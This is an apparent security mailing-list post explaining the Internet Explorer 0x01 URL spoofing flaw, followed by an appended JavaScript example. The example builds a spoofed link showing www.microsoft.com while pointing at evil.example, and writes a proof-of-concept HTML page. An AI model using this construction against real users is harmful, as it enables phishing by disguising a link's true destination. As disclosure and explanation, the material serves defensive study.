Hello all,
There is a big misconception in several people's minds about the recent 0x01 URL
Spoofing vuln., namely that scripting is necessary for exploitation. However, this is
not the case. Instead of using the %01 sequence and unescaping it[1], as in all the
exploits posted till now, a hex editor can be used to directly embed the 0x01 byte in
the URL. I have attached a proof of concept exploit to demonstrate this issue.
[1] unescape('http://[EMAIL PROTECTED]/spoof.htm');
Although the actual vulnerability is very simple, there has been a lot of confusion,
with people misunderstanding its nature, scope and exploitation in spite of the
presence of a number of proof of concept exploits. Apart from this, many other ideas
and exploits have been presented by several people for both mitigation and better
exploitation. A few facts about this vulnerability are presented below. I hope this
clears up some of the confusion.
1. This is only possible with the 0x01 byte.
2. SCRIPTING is NOT NECESSARY to exploit this vulnerability. A hex editor can be used
to embed the 0x01 byte. See the attached exploit.
3. This is not the same as the infamous "http://[EMAIL PROTECTED] URL Obfuscation"
technique that is mostly used by spammers.
4. If the %01 sequence is used, it is necessary to unescape() it.
5. IMO, this issue is not caused by an anomaly in IE's handling of non-printable
characters.
6. According to current information in the public domain, no browser other than IE
and dependent software like Outlook is vulnerable to this issue. So this is a
Microsoft-specific issue.
7. Other techniques like adding a null byte, using onmouseover or onclick, using %09,
etc. are used to obfuscate the malicious link in the status bar when the mouse is
hovered over the link. These are not part of the 0x01 URL Spoofing vulnerability and
are completely unrelated.
8. It is not necessary to tie the malicious URL to a button.
9. This vulnerability is really critical. Reasons have been discussed in great detail
on the lists. Think about the ease of exploitation, no scripting required, etc...
Regards,
--
S.G.Masood
Hyderabad,
India.
Attachment: PoC.zip
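The construction the post describes, as an added example that is not part of the original message or its attached PoC: the decoy host is placed in the userinfo part of the URL, a raw 0x01 byte is embedded directly (the hex-editor approach, so no unescape() and no scripting), and the real host follows the "@". The decoy and target hostnames, the path and the HTML wrapper are illustrative assumptions; `vulnerableAddressBar()` is a simplified model of the display behaviour the post attributes to IE (rendering stops at the first 0x01 byte), not a reproduction of IE's code, and decodeURIComponent() stands in for the unescape() call quoted in footnote [1].

```javascript
// Added example, not code from the original post or its PoC.zip.
// Hostnames, path and HTML below are constructed for illustration.
const RAW_0x01 = "\u0001"; // the byte a hex editor would drop into the HTML

// Build the spoofed href the way a hex editor would: the 0x01 byte is
// embedded directly, so no unescape() call (and no scripting) is needed.
function buildSpoofedHref(decoyHost, realHost, path) {
  return `http://${decoyHost}${RAW_0x01}@${realHost}${path}`;
}

// The %01 form seen in the scripted exploits is just six ASCII characters
// until it is unescaped; only the raw control byte triggers the issue.
function containsRawControlByte(href) {
  return href.includes(RAW_0x01);
}

// RFC 3986 view of the URL: everything between "//" and the last "@" of the
// authority is userinfo; the host the request actually goes to follows it.
function realHost(href) {
  const afterScheme = href.slice(href.indexOf("//") + 2);
  const authority = afterScheme.split("/")[0];
  const at = authority.lastIndexOf("@");
  return at === -1 ? authority : authority.slice(at + 1);
}

// Simplified model (assumption, not IE's code) of the behaviour the post
// describes: the address bar renders the URL only up to the first 0x01 byte.
// Without that byte the full "user@host" URL is shown, which is why the
// plain spammer-style "http://decoy@real/" trick is a different thing.
function vulnerableAddressBar(href) {
  const cut = href.indexOf(RAW_0x01);
  return cut === -1 ? href : href.slice(0, cut);
}

// Hex dump helper: confirms the control byte is really in the bytes that
// would be written to disk, i.e. what you would see in the hex editor.
function hexDump(str) {
  return Array.from(Buffer.from(str, "utf8"), (b) =>
    b.toString(16).padStart(2, "0")).join(" ");
}

// Minimal page carrying the link as a plain anchor: no <script>, no button.
function buildPocHtml(href) {
  return `<html><body><a href="${href}">Click here</a></body></html>\n`;
}

// Demonstration with constructed hostnames.
const spoofed = buildSpoofedHref("www.microsoft.com", "evil.example", "/spoof.htm");
console.log("displayed :", vulnerableAddressBar(spoofed));   // http://www.microsoft.com
console.log("real host :", realHost(spoofed));               // evil.example
console.log("bytes     :", hexDump(spoofed));                // ... 6d 01 40 65 ...

// The percent-encoded variant is harmless until it is unescaped.
const encoded = "http://www.microsoft.com%01@evil.example/spoof.htm";
console.log("raw byte in %01 form      :", containsRawControlByte(encoded));                    // false
console.log("raw byte after unescaping :", containsRawControlByte(decodeURIComponent(encoded))); // true
console.log(buildPocHtml(spoofed));
```

Writing `buildPocHtml(spoofed)` to disk with a binary-safe write (or pasting the byte in with a hex editor) yields a page whose only active content is an ordinary anchor, which is the point of fact 2 above; a URL parser that follows RFC 3986, as `realHost()` does, still resolves the request to the host after the "@".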
